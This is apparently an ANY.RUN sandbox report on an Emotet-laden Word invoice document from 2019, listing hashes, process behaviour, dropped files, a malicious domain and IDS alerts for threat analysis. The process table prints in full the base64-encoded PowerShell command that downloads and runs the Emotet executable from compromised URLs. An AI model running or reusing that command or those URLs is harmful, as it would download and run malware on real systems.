analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Invoice-GQK-4950978.doc

Full analysis: https://app.any.run/tasks/9430813b-3ee2-46ed-a712-b3c7dd80b876
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 09, 2019, 14:24:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Orchestrator, Subject: Beauty, Author: Gregg Brakus, Keywords: Practical Steel Pizza, Comments: attitude-oriented, Template: Normal.dotm, Last Saved By: Destin Williamson, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 07:25:00 2019, Last Saved Time/Date: Wed Oct 9 07:25:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 167, Security: 0
MD5:

F147A638D0C2C711C953D6FF2F835303

SHA1:

D473E466D01976EEF6BD3E90CBDFA958205DD765

SHA256:

188E238C1D848B2676E19739AAB5BF773BBF287C8B51D08F77D2541596FE2A4D

SSDEEP:

3072:VqswkQbVKgdzSrGNKyIwLx3EWuAbdTQ6y3geWkpdN6PpBAhsWsSbOnriTy:VqswkOVKUzS6nLx3Z89cBBnPqOn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 473.exe (PID: 1320)
      • 473.exe (PID: 3592)
      • msptermsizes.exe (PID: 3976)
      • msptermsizes.exe (PID: 2196)
    • Emotet process was detected

      • 473.exe (PID: 1320)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2916)
    • PowerShell script executed

      • powershell.exe (PID: 2916)
    • Creates files in the user directory

      • powershell.exe (PID: 2916)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2916)
      • 473.exe (PID: 1320)
    • Application launched itself

      • 473.exe (PID: 3592)
    • Starts itself from another location

      • 473.exe (PID: 1320)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3076)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3076)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Streich
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 195
Paragraphs: 1
Lines: 1
Company: Hansen, Hagenes and Hermann
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 167
Words: 29
Pages: 1
ModifyDate: 2019:10:09 06:25:00
CreateDate: 2019:10:09 06:25:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Destin Williamson
Template: Normal.dotm
Comments: attitude-oriented
Keywords: Practical Steel Pizza
Author: Gregg Brakus
Subject: Beauty
Title: Orchestrator
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 473.exe no specs #EMOTET 473.exe msptermsizes.exe no specs msptermsizes.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3076"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Invoice-GQK-4950978.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2916powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADQAOQAzADYAOAA3ADYANAAwADMAYwBiAD0AJwB4ADAANgA4ADMAYgA1ADUAMgA1ADkAMAAwACcAOwAkAHgAOAA2AGIAMQAyADUAYgAzADAAMAA0ACAAPQAgACcANAA3ADMAJwA7ACQAYwA1ADQANgAzADAAOAAzADAAMAA4AD0AJwBjAGIAMQAwADQAMQBiADUAMAAwADgAMgAnADsAJABjADAAMABjADMAOABjADIAMAA4ADAAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAeAA4ADYAYgAxADIANQBiADMAMAAwADQAKwAnAC4AZQB4AGUAJwA7ACQAYwAwADAAMAB4ADYAMAA0ADgAOAB4ADMAPQAnAHgAMAA0ADQAMgAwADUAMwA2ADAANAAnADsAJAB4ADUAMAA5ADAAeAA2ADMANgB4ADgAMwA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAHQALgB3AEUAYgBjAGwASQBlAE4AVAA7ACQAYwAwADUAYgB4ADcAeAA1ADIAMQBjAD0AJwBoAHQAdABwADoALwAvAGkAbgBkAHUAbABnAGUAYgBlAGEAdQB0AHkAcwB0AHUAZABpAG8ALgBjAG8ALgB1AGsALwBjAGcAaQAtAGIAaQBuAC8AMwBnADYAbQBnAHYANABlAHkAagAtAHcAaABtAHEAMAAtADgAMQA0ADgANQA0ADIAMAA0ADcALwBAAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBpAG4AaQB0AGUALQBoAGUAbABwAC4AbwByAGcALwBiAGwAbwBnAHMALwAwAHMAbQBtAHMAYwAtADIANgB1ADYANAAtADIAMQAvAEAAaAB0AHQAcABzADoALwAvAHMAYQBsAHUAdABhAHIAeQBmAGEAYwBpAGwAaQB0AHkALgBjAG8AbQAvAGoAcwAvAGMAcgBwAGsAYgBkAGsAcwByADgALQA3AHkAMAAxADIALQAyADAANQA4ADcAMwA1ADkALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAHUAcABwAG8AbAB5AHMAcABvAHIAdAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHYAMQAwAGQAaQBnAC0AdQBhAGYAYwByAGIAZAB4AHUALQAxADYALwBAAGgAdAB0AHAAOgAvAC8AcwB5AHMAdABlAG0AYQB0AGkAYwBzAGEAcgBsAC4AYwBvAG0ALwBpAG4AZABlAHgAMQAzAC8ANQBvADIAdwByAHIANgAtADEAdgB4ADIAagBnAGUAYgBrADEALQA2ADcAMQA3ADMAOQAxADMANAAvACcALgAiAFMAcABgAGwASQB0ACIAKAAnAEAAJwApADsAJABjAGMAOAAwADEANAA0ADAANwB4AGMAOAA4AD0AJwBiADYAMAB4AGIAMAAyAHgANQAxAHgAYgAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAAwADUAOQAwADQAYwAwADIAYgB4ADMAOQAgAGkAbgAgACQAYwAwADUAYgB4ADcAeAA1ADIAMQBjACkAewB0AHIAeQB7ACQAeAA1ADAAOQAwAHgANgAzADYAeAA4ADMALgAiAEQAbwB3AG4ATABPAGEAYABkAEYAaQBgAEwARQAiACgAJAB4ADAANQA5ADAANABjADAAMgBiAHgAMwA5ACwAIAAkAGMAMAAwAGMAMwA4AGMAMgAwADgAMAAwACkAOwAkAHgAMAA0ADAAOQB4ADIAeAAwADAAMAAwAD0AJwBjADEAMAA3AGIAYgAwADAAeAAzAGMAMAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAGMAMAAwAGMAMwA4AGMAMgAwADgAMAAwACkALgAiAGwAZQBgAE4ARwBUAEgAIgAgAC0AZwBlACAAMgA4ADkAOAAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABBAGAAUgBUACIAKAAkAGMAMAAwAGMAMwA4AGMAMgAwADgAMAAwACkAOwAkAGIAMQAzADQAMQAzAGMAMAAwADAAMAA9ACcAYgB4AGIAMgA3ADgAMgAxADQANAAwADAAJwA7AGIAcgBlAGEAawA7ACQAYwB4ADgAMAA3AGMAMAAzADgANwA0AD0AJwBiADQAMAA3ADIAeAA2ADMAeAAxADAAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYwAwAGIAMAAzADUANwB4ADIAOQBjAGMAYwA9ACcAeAAzADUAMAA1ADQAOAAwADUAMAA5ADAAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3592"C:\Users\admin\473.exe" C:\Users\admin\473.exepowershell.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
1320--69116f6eC:\Users\admin\473.exe
473.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
3976"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe473.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
2196--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exemsptermsizes.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Version:
1, 0, 0, 1
Total events
1 958
Read events
1 450
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
17

Dropped files

PID
Process
Filename
Type
3076WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB8B.tmp.cvr
MD5:
SHA256:
2916powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5MG2J0C4A3OS3XXNWUZF.temp
MD5:
SHA256:
3076WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BD9A426.wmfwmf
MD5:EBEC70396EF63C1CFFED28804F1ADC53
SHA256:0C52C8434F43056AE8157D156DE473D04AC56EA97C2A9332CF28D16FC70E1575
3076WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EC57C458.wmfwmf
MD5:28351042CCD77959540BE8C32ED334ED
SHA256:D44784C555DDA2C2AB32EFE133EC0EB8F69F881438115123C7D874233A8E8FCF
3076WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:5F164F748A88628A6B57CF492BA7D977
SHA256:B1DB20A9983B8FCE816AB64B8572F66FBBC997FA33E7EC946F197C4C38F37AB5
3076WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\392A79EF.wmfwmf
MD5:CA113E40F7FFBD5E2C8070D18739E12F
SHA256:F6E18C5375A8E501A6FB9F1C6FB285A67790133993A6FD5EE5EAEEC99F7923C0
3076WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\263DC8D5.wmfwmf
MD5:1793217AB2D8AD7164C5ABD7A761E0E6
SHA256:1BBE15F8BF2897057709ED4C5457F27F2D09FD4E565409A3D916E8BA5D0B22B3
3076WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84A786AB.wmfwmf
MD5:46D41CDCF9401757FB490A41928FCB8D
SHA256:609490BF4DDDBC4B120B83DB47AF550D2B4A99D1AF771ADA8B97A174DF10D1EA
3076WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:D74D371C7D57829B39F09BFF468FDCBA
SHA256:F77219E3DDEE0D777B1022DFCAAF558905567A00BA7DE1782EF1C6FB6ED74456
3076WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:6EBF3E66331D6B0ADBC722AC1A907348
SHA256:519DA667F878052A2AB45FC471358CC523F03D746B7CF910D69A2A8DB2C10FBE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2916
powershell.exe
160.153.129.225:80
indulgebeautystudio.co.uk
GoDaddy.com, LLC
US
malicious

DNS requests

Domain
IP
Reputation
indulgebeautystudio.co.uk
  • 160.153.129.225
malicious

Threats

PID
Process
Class
Message
2916
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2916
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2916
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info